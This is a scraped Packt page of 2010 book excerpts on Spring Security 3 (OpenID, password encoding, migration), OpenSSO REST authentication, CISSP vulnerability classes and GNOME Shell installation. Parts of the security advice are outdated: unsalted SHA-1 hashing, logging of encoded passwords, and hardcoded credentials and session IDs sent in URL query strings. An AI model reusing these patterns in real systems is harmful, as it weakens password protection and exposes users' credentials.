</http> After adding this configuration element and restarting the application, you will be able to use the OpenID login form to present an OpenID and navigate through the OpenID authentication process. When you are returned to JBCP Pets, however, you will be denied access. This is because your credentials won’t have any roles assigned to them. We’ll take care of this next. Adding OpenID users As we do not yet have OpenID-enabled new user registration, we'll need to manually insert the user account (that we'll be testing) into the database, by adding them to test-users-groups-data.sql in our database bootstrap code. We recommend that you use myOpenID for this step (notably, you will have trouble with Yahoo!, for reasons we'll explain in a moment). If we assume that our OpenID is https://jamesgosling.myopenid.com/, then the SQL that we'd insert in this file is as follows: insert into users(username, password, enabled, salt) values ('https:// jamesgosling.myopenid.com/','unused',true,CAST(RAND()*1000000000 AS varchar)); insert into group_members(group_id, username) select id,'https:// jamesgosling.myopenid.com/' from groups where group_ name='Administrators'; You'll note that this is similar to the other data that we inserted for our traditional username-and password-based admin account, with the exception that we have the value unused for the password. We do this, of course, because OpenID-based login doesn't require that our site should store a password on behalf of the user! The observant reader will note, however, that this does not allow a user to create an arbitrary username and password, and associate it with an OpenID—we describe this process briefly later in this article, and you are welcome to explore how to do this as an advanced application of this technology. At this point, you should be able to complete a full login using OpenID. The sequence of redirects is illustrated with arrows in the following screenshot: We've now OpenID-enabled JBCP Pets login! Feel free to test using several OpenID providers. You'll notice that, although the overall functionality is the same, the experience that the provider offers when reviewing and accepting the OpenID request differs greatly from provider to provider.
Read more
  • 0
  • 2
  • 43643
article-image-spring-security-configuring-secure-passwords
Packt
24 May 2010
6 min read
Save for later

Encode your password with Spring Security 3

Packt
24 May 2010
6 min read
This article by Peter Mularien is an excerpt from the book Spring Security 3. In this article, we will: Examine different methods of configuring password encoding Understand the password salting technique of providing additional security to stored passwords (For more resources on Spring, see here.) In any secured system, password security is a critical aspect of trust and authoritativeness of an authenticated principal. Designers of a fully secured system must ensure that passwords are stored in a way in which malicious users would have an impractically difficult time compromising them. The following general rules should be applied to passwords stored in a database: Passwords must not be stored in cleartext (plain text) Passwords supplied by the user must be compared to recorded passwords in the database A user's password should not be supplied to the user upon demand (even if the user forgets it) For the purposes of most applications, the best fit for these requirements involves one-way encoding or encryption of passwords as well as some type of randomization of the encrypted passwords. One-way encoding provides the security and uniqueness properties that are important to properly authenticate users with the added bonus that once encrypted, the password cannot be decrypted. In most secure application designs, it is neither required nor desirable to ever retrieve the user's actual password upon request, as providing the user's password to them without proper additional credentials could present a major security risk. Most applications instead provide the user the ability to reset their password, either by presenting additional credentials (such as their social security number, date of birth, tax ID, or other personal information), or through an email-based system. Storing other types of sensitive information Many of the guidelines listed that apply to passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways, for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards). You may already be thinking ahead and wondering, given our (admittedly unrealistic) approach of using SQL to populate our HSQL database with users, how do we encode the passwords? HSQL, or most other databases for that matter, don't offer encryption methods as built-in database functions. Typically, the bootstrap process (populating a system with initial users and data) is handled through some combination of SQL loads and Java code. Depending on the complexity of your application, this process can get very complicated. For the JBCP Pets application, we'll retain the embedded-database declaration and the corresponding SQL, and then add a small bit of Java to fire after the initial load to encrypt all the passwords in the database. For password encryption to work properly, two actors must use password encryption in synchronization ensuring that the passwords are treated and validated consistently. Password encryption in Spring Security is encapsulated and defined by implementations of the o.s.s.authentication.encoding.PasswordEncoder interface. Simple configuration of a password encoder is possible through the <password-encoder> declaration within the <authentication-provider> element as follows: <authentication-manager alias="authenticationManager"> <authentication-provider user-service-ref="jdbcUserService"> <password-encoder hash="sha"/> </authentication-provider></authentication-manager> You'll be happy to learn that Spring Security ships with a number of implementations of PasswordEncoder, which are applicable for different needs and security requirements. The implementation used can be specified using the hash attribute of the <password-encoder> declaration. The following table provides a list of the out of the box implementation classes and their benefits. Note that all implementations reside in the o.s.s.authentication. encoding package. Implementation class Description hash value PlaintextPasswordEncoder Encodes the password as plaintext. Default DaoAuthenticationProvider password encoder. plaintext Md4PasswordEncoder PasswordEncoder utilizing the MD4 hash algorithm. MD4 is not a secure algorithm-use of this encoder is not recommended. md4 Md5PasswordEncoder PasswordEncoder utilizing the MD5 one-way encoding algorithm. md5 ShaPasswordEncoder PasswordEncoder utilizing the SHA one-way encoding algorithm. This encoder can support confi gurable levels of encoding strength. Sha   sha-256 LdapShaPasswordEncoder Implementation of LDAP SHA and LDAP SSHA algorithms used in integration with LDAP authentication stores. {sha}   {ssha}   As with many other areas of Spring Security, it's also possible to reference a bean definition implementing PasswordEncoder to provide more precise configuration and allow the PasswordEncoder to be wired into other beans through dependency injection. For JBCP Pets, we'll need to use this bean reference method in order to encode the bootstrapped user data. Let's walk through the process of configuring basic password encoding for the JBCP Pets application. Configuring password encoding Configuring basic password encoding involves two pieces—encrypting the passwords we load into the database after the SQL script executes, and ensuring that the DaoAuthenticationProvider is configured to work with a PasswordEncoder. Configuring the PasswordEncoder First, we'll declare an instance of a PasswordEncoder as a normal Spring bean: <bean class="org.springframework.security.authentication. encoding.ShaPasswordEncoder" id="passwordEncoder"/> You'll note that we're using the SHA-1 PasswordEncoder implementation. This is an efficient one-way encryption algorithm, commonly used for password storage. Configuring the AuthenticationProvider We'll need to configure the DaoAuthenticationProvider to have a reference to the PasswordEncoder, so that it can encode and compare the presented password during user login. Simply add a <password-encoder> declaration and refer to the bean ID we defined in the previous step: <authentication-manager alias="authenticationManager"> <authentication-provider user-service-ref="jdbcUserService"> <password-encoder ref="passwordEncoder"/> </authentication-provider></authentication-manager> Try to start the application at this point, and then try to log in. You'll notice that what were previously valid login credentials are now being rejected. This is because the passwords stored in the database (loaded with the bootstrap test-users-groupsdata. sql script) are not stored in an encrypted form that matches the password encoder. We'll need to post-process the bootstrap data with some simple Java code. Writing the database bootstrap password encoder The approach we'll take for encoding the passwords loaded via SQL is to have a Spring bean that executes an init method after the embedded-database bean is instantiated. The code for this bean, com.packtpub.springsecurity.security. DatabasePasswordSecurerBean, is fairly simple. public class DatabasePasswordSecurerBean extends JdbcDaoSupport { @Autowired private PasswordEncoder passwordEncoder; public void secureDatabase() { getJdbcTemplate().query("select username, password from users", new RowCallbackHandler(){ @Override public void processRow(ResultSet rs) throws SQLException { String username = rs.getString(1); String password = rs.getString(2); String encodedPassword = passwordEncoder.encodePassword(password, null); getJdbcTemplate().update("update users set password = ? where username = ?", encodedPassword,username); logger.debug("Updating password for username: "+username+" to: "+encodedPassword); } }); } } The code uses the Spring JdbcTemplate functionality to loop through all the users in the database and encode the password using the injected PasswordEncoder reference. Each password is updated individually.
Read more
  • 0
  • 0
  • 10184

article-image-migration-spring-security-3
Packt
21 May 2010
5 min read
Save for later

Migration to Spring Security 3

Packt
21 May 2010
5 min read
(For more resources on Spring, see here.) During the course of this article we will: Review important enhancements in Spring Security 3 Understand configuration changes required in your existing Spring Security 2 applications when moving them to Spring Security 3 Illustrate the overall movement of important classes and packages in Spring Security 3 Once you have completed the review of this article, you will be in a good position to migrate an existing application from Spring Security 2 to Spring Security 3. Migrating from Spring Security 2 You may be planning to migrate an existing application to Spring Security 3, or trying to add functionality to a Spring Security 2 application and looking for guidance. We'll try to address both of your concerns in this article. First, we'll run through the important differences between Spring Security 2 and 3—both in terms of features and configuration. Second, we'll provide some guidance in mapping configuration or class name changes. These will better enable you to translate the examples from Spring Security 3 back to Spring Security 2 (where applicable). A very important migration note is that Spring Security 3 mandates a migration to Spring Framework 3 and Java 5 (1.5) or greater. Be aware that in many cases, migrating these other components may have a greater impact on your application than the upgrade of Spring Security! Enhancements in Spring Security 3 Significant enhancements in Spring Security 3 over Spring Security 2 include the following: The addition of Spring Expression Language (SpEL) support for access declarations, both in URL patterns and method access specifications. Additional fine-grained configuration around authentication and accessing successes and failures. Enhanced capabilities of method access declaration, including annotationbased pre-and post-invocation access checks and filtering, as well as highly configurable security namespace XML declarations for custom backing bean behavior. Fine-grained management of session access and concurrency control using the security namespace. Noteworthy revisions to the ACL module, with the removal of the legacy ACL code in o.s.s.acl and some important issues with the ACL framework are addressed. Support for OpenID Attribute Exchange, and other general improvements to the robustness of OpenID. New Kerberos and SAML single sign-on support through the Spring Security Extensions project. Other more innocuous changes encompassed a general restructuring and cleaning up of the codebase and the configuration of the framework, such that the overall structure and usage makes much more sense. The authors of Spring Security have made efforts to add extensibility where none previously existed, especially in the areas of login and URL redirection. If you are already working in a Spring Security 2 environment, you may not find compelling reasons to upgrade if you aren't pushing the boundaries of the framework. However, if you have found limitations in the available extension points, code structure, or configurability of Spring Security 2, you'll welcome many of the minor changes that we discuss in detail in the remainder of this article. Changes to configuration in Spring Security 3 Many of the changes in Spring Security 3 will be visible in the security namespace style of configuration. Although this article cannot cover all of the minor changes in detail, we'll try to cover those changes that will be most likely to affect you as you move to Spring Security 3. Rearranged AuthenticationManager configuration The most obvious changes in Spring Security 3 deal with the configuration of the AuthenticationManager and any related AuthenticationProvider elements. In Spring Security 2, the AuthenticationManager and AuthenticationProvider configuration elements were completely disconnected—declaring an AuthenticationProvider didn't require any notion of an AuthenticationManager at all. <authentication-provider> <jdbc-user-service data-source-ref="dataSource" /></authentication-provider> In Spring Security 2 to declare the <authentication-manager> element as a sibling of any AuthenticationProvider. <authentication-manager alias="authManager"/><authentication-provider> <jdbc-user-service data-source-ref="dataSource"/></authentication-provider><ldap-authentication-provider server-ref="ldap://localhost:10389/"/> In Spring Security 3, all AuthenticationProvider elements must be the children of <authentication-manager> element, so this would be rewritten as follows: <authentication-manager alias="authManager"> <authentication-provider> <jdbc-user-service data-source-ref="dataSource" /> </authentication-provider> <ldap-authentication-provider server-ref= "ldap://localhost:10389/"/></authentication-manager> Of course, this means that the <authentication-manager> element is now required in any security namespace configurations. If you had defined a custom AuthenticationProvider in Spring Security 2, you would have decorated it with the <custom-authentication-provider> element as part of its bean definition. <bean id="signedRequestAuthenticationProvider" class="com.packtpub.springsecurity.security .SignedUsernamePasswordAuthenticationProvider"> <security:custom-authentication-provider/> <property name="userDetailsService" ref="userDetailsService"/><!-- ... --></bean> While moving this custom AuthenticationProvider to Spring Security 3, we would remove the decorator element and instead configure the AuthenticationProvider using the ref attribute of the <authentication-provider> element as follows: <authentication-manager alias="authenticationManager"> <authentication-provider ref= "signedRequestAuthenticationProvider"/></authentication-manager> Of course, the source code of our custom provider would change due to class relocations and renaming in Spring Security 3—look later in the article for basic guidelines, and in the code download for this article to see a detailed mapping. New configuration syntax for session management options In addition to continuing support for the session fixation and concurrency control features from prior versions of the framework, Spring Security 3 adds new configuration capabilities for customizing URLs and classes involved in session and concurrency control management. If your older application was configuring session fixation protection or concurrent session control, the configuration settings have a new home in the <session-management> directive of the <http> element. In Spring Security 2, these options would be configured as follows: <http ... session-fixation-protection="none"><!-- ... --> <concurrent-session-control exception-if-maximum-exceeded ="true" max-sessions="1"/></http> The analogous configuration in Spring Security 3 removes the session-fixation-protection attribute from the <http> element, and consolidates as follows: <http ...> <session-management session-fixation-protection="none"> <concurrency-control error-if-maximum-exceeded ="true" max-sessions="1"/> </session-management></http> You can see that the new logical organization of these options is much more sensible and leaves room for future expansion.
Read more
  • 0
  • 0
  • 20946

article-image-securing-our-applications-using-opensso-glassfish-security
Packt
12 May 2010
8 min read
Save for later

Securing our Applications using OpenSSO in GlassFish Security

Packt
12 May 2010
8 min read
An example of such system is integration between an online shopping system, the product provider who actually produces the goods, the insurance company that provides insurance on purchases, and finally the shipping company that delivers the goods to the consumers' hand. All of these systems access some parts of the data, which flows into the other software to perform its job in an efficient way. All the employees can benefit from a single sign-on solution, which keeps them free from having to authenticate themselves multiple times during the working day. Another example can be a travel portal, whose clients need to communicate with many other systems to plan their traveling. Integration between an in-house system and external partners can happen in different levels, from communication protocol and data format to security policies, authentication, and authorization. Because of the variety of communication models, policies, and client types that each partner may use, unifying the security model is almost impossible and the urge for some kind of integration mechanism shows itself bolder and bolder. SSO as a concept and OpenSSO as a product address this urge for integrating the systems' security together. OpenSSO provides developers with several client interfaces to interact with OpenSSO to perform authentication, authorization, session and identity management, and audition. These interfaces include Client SDK for different programming languages and using standards including: Liberty Alliance Project and Security Assertion Markup Language (SAML) for authentication and single sign-on (SSO) XML Access Control Markup Language (XACML) for authorization functions Service Provisioning Markup Language (SPML) for identity management functions. Using the client SDKs and standards mentioned above are suitable when we are developing custom solutions or integrating our system with partners, which are already using them in their security infrastructure. For any other scenario these methods are overkill for developers. To make it easier for the developers to interact with OpenSSO core services the Identity Web Services are provided. We discussed IWS briefly in OpenSSO functionalities section. The IWS are included in OpenSSO to perform the tasks included in the following table. Task Description Authentication and Single sign-on Verifying the user credentials or its authentication token. Authorization Checking the authenticated user's permissions for accessing a resource. Provisioning Creating, deleting, searching, and editing users. Logging Ability to audit and record operations. IWS are exposed in two models—the first model is the WS-* compliant SOAP-based Web Services and the second model is a very simple but elegant RESTful set of services based on HTTP and REST principles. Finally, the third way of using OpenSSO is deploying the policy agents to protect the resources available in a container. In the following section we will use RESTful interface to perform authentication, authorization, and SSO. Authenticating users by the RESTful interface Performing authentication using the RESTful Web Services interface is very simple as it is just like performing a pure HTTP communication with an HTTP server. For each type of operation there is one URL, which may have some required parameters and the output is what we can expect from that operation. The URL for authentication operation along with its parameters is as follows: Operation: Authentication Operation URL: http://host:port/OpenSSOContext/identity/authenticate Parameters: username, password, uri Output: subjectid The Operation URL specifies the address of a Servlet which will receive the required parameters, perform the operation, and write back the result. In the template included above we have the host, port, and OpenSSOContext which are things we already know. After the context we have the path to the RESTful service we want to invoke. The path includes the task type, which can be one of the tasks included in the IWS task lists table and the operation we want to invoke. All parameters are self-descriptive except the uri. We pass a URL to have our users redirected to it after the authentication is performed. This URL can include information related to the user or the original resource which the user has requested. In the case of successful authentication we will receive a subjectid, which we can use in any other RESTful operation like authorization, to log in, log out, and so on. If you remember session ID from your web development experience, subjected is the same as session ID. You can view all sessions along with related information from the OpenSSO administration console homepage under the Sessions tab. The following listing shows a sample JSP page which performs a RESTful call over OpenSSO to authenticate a user and obtain a session ID for the user if they get authenticated. <%try {String operationURL ="http://gfbook.pcname.com:8080/opensso/identity/authenticate";String username = "james";String password = "james";username = java.net.URLEncoder.encode(username, "UTF-8");password = java.net.URLEncoder.encode(password, "UTF-8");String operationString = operationURL + "?username=" +username +"&password=" + password;java.net.URL Operation = new java.net.URL(operationString);java.net.HttpURLConnection connection =(java.net.HttpURLConnection)Operation.openConnection();int responseCode = connection.getResponseCode();if (responseCode == java.net.HttpURLConnection.HTTP_OK) {java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader((java.io.InputStream) connection.getContent()));out.println("<h2>Subject ID</h2>");String line = reader.readLine();out.println(line);}} catch (Exception e) {e.printStackTrace();}%> REST made straightforward tasks easier than ever. Without using REST we would have dealt with complexity of SOAP and WSDL and so on but with REST you can understand the whole code with the first scan. Beginning from the top, we define the REST operation URL, which is assembled using the operation URL and appending the required parameters using the parameters name and the parameters value. The URL that we will connect to it will be something like: http://gfbook.pcname.com:8080/opensso/identity/authenticate?username=james&password=james After assembling the URL we open a network connection to authenticate it. After opening the connection we can check to see whether we received an HTTP_OK response from the server or not. Receiving the HTTP_OK means that the authentication was successful and we can read the subjectid from the socket. The connection may result in other response codes like HTTP_UNAUTHORIZED (HTTP Error code 401) when the credentials are not valid. A complete list of possible return values can be found at http://java.sun.com/javase/6/docs/api/java/net/HttpURLConnection.html. Authorizing using REST If you remember in Configuring OpenSSO for authentication and authorization section we defined a rule that was set to police http://gfbook.pcname.com:8080/ URL for us. And later on we applied the policy rule to a group of users that we created; now we want to check and see how our policy works. In every security system, before any authorization process, an authentication process should compete with a positive result. In our case the result for the authentication is subjectid, which the authorization process will use to check whether the authenticated entity is allowed to perform the action or not. The URL for the authorization operation along with its parameters is as follows: Operation: Authorization Operation URL: http://host:port/OpenSSOContext/identity/authorize Parameters: uri, action, subjectid Output: True or false based on the permission of subject over the entity and given action The combination of uri, action, and subjectid specifies that we want to check our client, identified by subjectid, permission for performing the specified action on the resource identified by the uri. The output of the service invocation is either true or false. The following listing shows how we can check whether an authenticated user has access to a certain resource or not. In the sample code we are checking james, identified by his subjectid we acquired by executing the previous code snippet, against the localhost Protector rule we defined earlier. <%try {String operationURL ="http://gfbook.pcname.com:8080/opensso/identity/authorize";String protectecUrl = " http://127.0.0.1:38080/Conversion-war/";String subjectId ="AQIC5wM2LY4SfcyemVIZX6qBGdyH7b8C5KFJjuuMbw4oj24=@AAJTSQACMDE=#";String action = "POST";protectecUrl = java.net.URLEncoder.encode(protectecUrl, "UTF-8");subjectId = java.net.URLEncoder.encode(subjectId, "UTF-8");String operationString = operationURL + "?uri=" + protectecUrl +"&action=" + action + "&subjectid=" + subjectId;java.net.URL Operation = new java.net.URL(operationString);java.net.HttpURLConnection connection =(java.net.HttpURLConnection) Operation.openConnection();int responseCode = connection.getResponseCode();if (responseCode == java.net.HttpURLConnection.HTTP_OK) {java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader((java.io.InputStream) connection.getContent()));out.println("<h2>authorization Result</h2>");String line = reader.readLine();out.println(line);}} catch (Exception e) {e.printStackTrace();}%> For this listing everything is the same as the authentication process in terms of initializing objects and calling methods, except that in the beginning we define the protected URL string, then we include the subjectid, which is result of our previous authentication. Later on we define the action that we need to check the permission of our authenticated user over it and finally we read the result of authorization. The complete operation after including all parameters is similar to the following snippet: http://gfbook.pcname.com:8080/opensso/identity/authorize?uri=http://127.0.0.1:38080/Conversion-war/&action=POST&subjectid=subjectId Pay attention that two subjectid elements cannot be similar even for the same user on the same machine and same OpenSSO installation. So, before running this code, make sure that you perform the authentication process and include the subjectid resulted from your authentication with the subjectid we specified previously.
Read more
  • 0
  • 0
  • 4095
article-image-cissp-vulnerability-and-penetration-testing-access-control
Packt
12 Mar 2010
6 min read
Save for later

CISSP: Vulnerability and Penetration Testing for Access Control

Packt
12 Mar 2010
6 min read
IT components such as operating systems, application software, and even networks, have many vulnerabilities. These vulnerabilities are open to compromise or exploitation. This creates the possibility for penetration into the systems that may result in unauthorized access and a compromise of confidentiality, integrity, and availability of information assets. Vulnerability tests are performed to identify vulnerabilities while penetration tests are conducted to check the following: The possibility of compromising the systems such that the established access control mechanisms may be defeated and unauthorized access is gained The systems can be shut down or overloaded with malicious data using techniques such as DoS attacks, to the point where access by legitimate users or processes may be denied Vulnerability assessment and penetration testing processes are like IT audits. Therefore, it is preferred that they are performed by third parties. The primary purpose of vulnerability and penetration tests is to identify, evaluate, and mitigate the risks due to vulnerability exploitation. Vulnerability assessment Vulnerability assessment is a process in which the IT systems such as computers and networks, and software such as operating systems and application software are scanned in order to indentify the presence of known and unknown vulnerabilities. Vulnerabilities in IT systems such as software and networks can be considered holes or errors. These vulnerabilities are due to improper software design, insecure coding, or both. For example, buffer overflow is a vulnerability where the boundary limits for an entity such as variables and constants are not properly defined or checked. This can be compromised by supplying data which is greater than what the entity can hold. This results in a memory spill over into other areas and thereby corrupts the instructions or code that need to be processed by the microprocessor. When a vulnerability is exploited it results in a security violation, which will result in a certain impact. A security violation may be an unauthorized access, escalation of privileges, or denial-of-service to the IT systems. Tools are used in the process of identifying vulnerabilities. These tools are called vulnerability scanners. A vulnerability scanning tool can be a hardware-based or software application. Generally, vulnerabilities can be classified based on the type of security error. A type is a root cause of the vulnerability. Vulnerabilities can be classified into the following types: Access Control Vulnerabilities It is an error due to the lack of enforcement pertaining to users or functions that are permitted, or denied, access to an object or a resource. Examples: Improper or no access control list or table No privilege model Inadequate file permissions Improper or weak encoding Security violation and impact: Files, objects, or processes can be accessed directly without authenticationor routing. Authentication Vulnerabilities It is an error due to inadequate identification mechanisms so that a user or a process is not correctly identified. Examples: Weak or static passwords Improper or weak encoding, or weak algorithms Security violation and impact: An unauthorized, or less privileged user (for example, Guest user), or a less privileged process gains higher privileges, such as administrative or root access to the system Boundary Condition Vulnerabilities It is an error due to inadequate checking and validating mechanisms such that the length of the data is not checked or validated against the size of the data storage or resource. Examples: Buffer overflow Overwriting the original data in the memory Security violation and impact: Memory is overwritten with some arbitrary code so that is gains access to programs or corrupts the memory. This will ultimately crash the operating system. An unstable system due to memory corruption may be exploited to get command prompt, or shell access, by injecting an arbitrary code Configuration Weakness Vulnerabilities It is an error due to the improper configuration of system parameters, or leaving the default configuration settings as it is, which may not be secure. Examples: Default security policy configuration File and print access in Internet connection sharing Security violation and impact: Most of the default configuration settings of many software applications are published and are available in the public domain. For example, some applications come with standard default passwords. If they are not secured, they allow an attacker to compromise the system. Configuration weaknesses are also exploited to gain higher privileges resulting in privilege escalation impacts. Exception Handling Vulnerabilities It is an error due to improper setup or coding where the system fails to handle, or properly respond to, exceptional or unexpected data or conditions. Example: SQL Injection Security violation and impact: By injecting exceptional data, user credentials can be captured by an unauthorized entity Input Validation Vulnerabilities It is an error due to a lack of verification mechanisms to validate the input data or contents. Examples: Directory traversal Malformed URLs Security violation and impact: Due to poor input validation, access to system-privileged programs may be obtained. Randomization Vulnerabilities It is an error due to a mismatch in random data or random data for the process. Specifically, these vulnerabilities are predominantly related to encryption algorithms. Examples: Weak encryption key Insufficient random data Security violation and impact: Cryptographic key can be compromised which will impact the data and access security. Resource Vulnerabilities It is an error due to a lack of resources availability for correct operations or processes. Examples: Memory getting full CPU is completely utilized Security violation and impact: Due to the lack of resources the system becomes unstable or hangs. This results in a denial of services to the legitimate users. State Error It is an error that is a result of the lack of state maintenance due to incorrect process flows. Examples: Opening multiple tabs in web browsers Security violation and impact: There are specific security attacks, such as Cross-site scripting (XSS), that will result in user-authenticated sessions being hijacked. Information security professionals need to be aware of the processes involved in identifying system vulnerabilities. It is important to devise suitable countermeasures, in a cost effective and efficient way, to reduce the risk factor associated with the identified vulnerabilities. Some such measures are applying patches supplied by the application vendors and hardening the systems.
Read more
  • 0
  • 0
  • 7042

article-image-install-gnome-shell-ubuntu-910-karmic-koala
Packt
18 Jan 2010
3 min read
Save for later

Install GNOME-Shell on Ubuntu 9.10 "Karmic Koala"

Packt
18 Jan 2010
3 min read
Remember, these are development builds and preview snapshots, and are still in the early stages. While it appears to be functional (so far) your mileage may vary. Installing GNOME-Shell With the release of Ubuntu 9.10, a GNOME-Shell preview is included in the repositories. This makes it very easy to install (and remove) as needed. The downside is that it is just a snapshot so you are not running the latest-greatest builds. For this reason I've included instructions on installing the package as well as compiling the latest builds. I should also note that GNOME Shell requires reasonable 3D support. This means that it will likely *not* work within a virtual machine. In particular, problems have been reported trying to run GNOME Shell with 3D support in VirtualBox. Package Installation If you'd prefer to install the package and just take a sneak-peek at the snapshot, simply run the command below in your terminal: sudo aptitude install gnome-shell Manual Compilation Manually compiling GNOME Shell will allow you to use the latest and greatest builds, but it can also require more work. The notes below are based on a successful build I did in late 2009, but your mileage may vary. If you run into problems please note the following: Installing GNOME Shell does not affect your current installation, so if the build breaks you should still have a clean environment. You can find more details as well as known issues here: GnomeShell There is one package that you'll need to compile GNOME Shell called jhbuild. This package, however, has been removed from the Ubuntu 9.10 repositories for being outdated. I did find that I could use the package from the 9.04 repository and haven’t noticed any problems in doing so. To install jhbuild from the 9.04 repository use the instructions below: Visit http://packages.ubuntu.com/jaunty/all/jhbuild/download Select a mirror close to you Download / Install the .deb package. I don’t believe there are any additional dependencies needed for this package. After that package is installed you’ll want to download a GNOME Shell Build Setup script which makes this entire process much, much simpler. cd ~ wget http://git.gnome.org/cgit/gnome-shell/plain/tools/build/gnome-shell-build-setup.sh This script will handle finding and installing dependencies as well as compiling the builds, etc. To launch this script, run the command: gnome-shell-build-setup.sh You'll need to ensure that any suggested packages are installed before continuing. You may need to re-run this script multiple times until it has no more warnings. Lastly, you can begin the build process. This process took about twenty minutes on my C2D 2.0Ghz Dell laptop. My build was completely automated, but considering this is building newer and newer builds, your mileage may vary. To begin the build process on your machine, run the command: jhbuild build Ready To Launch Congratulations! You've now got GNOME-Shell installed and ready to launch. I've outlined the steps below. Please take note of the method, depending on how you installed. Also, please note that before you launch GNOME-Shell you must DISABLE Compiz. If you have Compiz running, navigate to System > Preferences > Appearances and disable it under the Desktop Effects tab. Package Installation Launch gnome-shell --replace Manual Compilation It will as follows: ~/gnome-shell/source/gnome-shell/src/gnome-shell --replace
Read more
  • 0
  • 0
  • 12276
Modal Close icon
Modal Close icon